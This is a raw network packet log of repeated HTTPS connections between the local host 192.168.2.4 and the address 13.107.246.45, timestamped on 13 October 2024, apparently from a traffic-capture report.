                                                  Oct 13, 2024 19:34:40.195640087 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.196084976 CEST49936443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.196100950 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.196472883 CEST49936443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.196480989 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.209773064 CEST4434993513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.209840059 CEST4434993513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.209913015 CEST49935443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.210011959 CEST49935443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.210031033 CEST4434993513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.210045099 CEST49935443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.210048914 CEST4434993513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.212645054 CEST49940443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.212686062 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.212740898 CEST49940443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.212907076 CEST49940443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.212918997 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.265409946 CEST4434993713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.265742064 CEST49937443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.265763044 CEST4434993713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.266093969 CEST49937443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.266099930 CEST4434993713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.283588886 CEST4434993913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.283874035 CEST49939443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.283894062 CEST4434993913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.284192085 CEST49939443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.284198999 CEST4434993913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.300163984 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.300235033 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.300298929 CEST49936443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.300312996 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.300349951 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.300378084 CEST49936443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.300396919 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.300405979 CEST49936443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.300405979 CEST49936443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.300415039 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.300421000 CEST4434993613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.302468061 CEST49941443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.302504063 CEST4434994113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.302594900 CEST49941443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.302752972 CEST49941443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.302772045 CEST4434994113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.361583948 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.361998081 CEST49938443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.362004995 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.362390995 CEST49938443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.362394094 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.371140957 CEST4434993713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.371437073 CEST4434993713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.371490002 CEST49937443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.371550083 CEST49937443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.371562004 CEST4434993713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.371598959 CEST49937443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.371603966 CEST4434993713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.373939991 CEST49942443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.373959064 CEST4434994213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.374214888 CEST49942443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.374351978 CEST49942443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.374366999 CEST4434994213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.387983084 CEST4434993913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.388048887 CEST4434993913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.388102055 CEST49939443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.388200998 CEST49939443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.388215065 CEST4434993913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.388225079 CEST49939443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.388231039 CEST4434993913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.390295029 CEST49943443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.390330076 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.390383005 CEST49943443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.390480995 CEST49943443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.390492916 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.479345083 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.479448080 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.479522943 CEST49938443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.479530096 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.479542971 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.479595900 CEST49938443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.479638100 CEST49938443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.479641914 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.479650974 CEST49938443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.479654074 CEST4434993813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.482144117 CEST49944443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.482233047 CEST4434994413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:40.482317924 CEST49944443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.482462883 CEST49944443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:40.482501030 CEST4434994413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.232517958 CEST4434994213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.234040022 CEST49942443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.234040022 CEST49942443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.234077930 CEST4434994213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.234100103 CEST4434994213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.234349012 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.235063076 CEST49943443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.235084057 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.235282898 CEST49943443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.235287905 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.236551046 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.237271070 CEST49940443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.237271070 CEST49940443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.237287045 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.237293959 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.240228891 CEST4434994113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.240885019 CEST49941443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.240885019 CEST49941443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.240891933 CEST4434994113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.240909100 CEST4434994113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.241883993 CEST4434994413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.242580891 CEST49944443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.242582083 CEST49944443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.242645979 CEST4434994413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.242691040 CEST4434994413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.335793018 CEST4434994213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.335901022 CEST4434994213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.336154938 CEST49942443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.336154938 CEST49942443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.336184025 CEST49942443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.336203098 CEST4434994213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.337770939 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.337896109 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.338026047 CEST49943443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.338404894 CEST49943443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.338418007 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.338536024 CEST49943443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.338541031 CEST4434994313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.339577913 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.339813948 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.339950085 CEST49940443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.340046883 CEST49945443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.340085983 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.340154886 CEST49945443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.340473890 CEST49940443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.340473890 CEST49940443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.340478897 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.340487003 CEST4434994013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.340800047 CEST49945443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.340811968 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.341995001 CEST49946443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.342003107 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.342135906 CEST49946443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.342298985 CEST49946443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.342309952 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.343236923 CEST49947443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.343285084 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.343555927 CEST49947443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.343586922 CEST49947443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.343605042 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.344877958 CEST4434994413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.345029116 CEST4434994413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.345128059 CEST49944443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.345128059 CEST49944443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.345154047 CEST49944443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.345164061 CEST4434994413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.345664978 CEST4434994113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.345834017 CEST4434994113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.346004963 CEST49941443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.346004963 CEST49941443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.346155882 CEST49941443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.346160889 CEST4434994113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.348231077 CEST49949443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.348247051 CEST49948443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.348262072 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.348275900 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.348429918 CEST49949443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.348541021 CEST49948443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.348572969 CEST49948443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.348582983 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.348706007 CEST49949443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.348718882 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.990293026 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.991170883 CEST49945443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.991203070 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.991740942 CEST49945443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.991744995 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.992372990 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.992872000 CEST49946443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.992887974 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:41.993460894 CEST49946443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:41.993465900 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.003897905 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.004348993 CEST49949443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.004373074 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.004595995 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.004942894 CEST49949443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.004951000 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.005146980 CEST49948443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.005165100 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.005635023 CEST49948443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.005640030 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.018076897 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.018754959 CEST49947443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.018789053 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.019366026 CEST49947443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.019372940 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.092462063 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.092816114 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.092865944 CEST49945443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.092941999 CEST49945443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.092966080 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.092979908 CEST49945443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.092987061 CEST4434994513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.094891071 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.094929934 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.094994068 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.095046997 CEST49946443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.095606089 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.095644951 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.095792055 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.095930099 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.095942974 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.096164942 CEST49946443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.096169949 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.096188068 CEST49946443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.096191883 CEST4434994613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.098702908 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.098737955 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.098793983 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.099143982 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.099164009 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.104923964 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.105114937 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.105263948 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.105321884 CEST49948443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.105624914 CEST49948443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.105638981 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.105654955 CEST49948443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.105669975 CEST4434994813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.105676889 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.105714083 CEST49949443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.105755091 CEST49949443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.105767965 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.105784893 CEST49949443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.105789900 CEST4434994913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.109746933 CEST49952443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.109770060 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.109821081 CEST49952443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.110004902 CEST49953443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.110037088 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.110080004 CEST49953443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.110255957 CEST49952443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.110275030 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.110299110 CEST49953443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.110311031 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.124480963 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.124567986 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.124607086 CEST49947443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.124794960 CEST49947443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.124814034 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.124842882 CEST49947443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.124850035 CEST4434994713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.127485991 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.127512932 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.127572060 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.127698898 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.127710104 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.756198883 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.756644011 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.756650925 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.756663084 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.757136106 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.757137060 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.757147074 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.757158995 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.757630110 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.757637024 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.761253119 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.761611938 CEST49953443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.761629105 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.761964083 CEST49953443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.761970043 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.765117884 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.765434980 CEST49952443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.765461922 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:42.765790939 CEST49952443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:42.765796900 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042382002 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042398930 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042454004 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042484999 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042531013 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042562962 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042566061 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042573929 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042606115 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042619944 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042644978 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042659044 CEST49953443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042665005 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042776108 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042776108 CEST49950443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042778015 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042792082 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042797089 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042799950 CEST4434995013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042819023 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042824030 CEST49951443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.042831898 CEST4434995113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042880058 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.042977095 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.043360949 CEST49952443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.043360949 CEST49952443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.043364048 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.043399096 CEST49952443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.043404102 CEST4434995213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.044284105 CEST49953443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.044289112 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.044318914 CEST49953443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.044323921 CEST4434995313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.044414043 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.044420958 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.044795036 CEST49954443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.044799089 CEST4434995413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.046720982 CEST49955443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.046747923 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.047175884 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047266006 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.047307014 CEST49955443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047398090 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047624111 CEST49955443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047621965 CEST49957443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047632933 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.047661066 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.047733068 CEST49957443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047733068 CEST49958443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047753096 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.047863007 CEST49956443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047893047 CEST49958443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047893047 CEST49957443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047904015 CEST4434995713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.047909021 CEST4434995613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.047951937 CEST49958443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.047956944 CEST4434995813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.708692074 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.709530115 CEST49955443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:43.709557056 CEST4434995513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:43.709775925 CEST49955443192.168.2.413.107.246.45
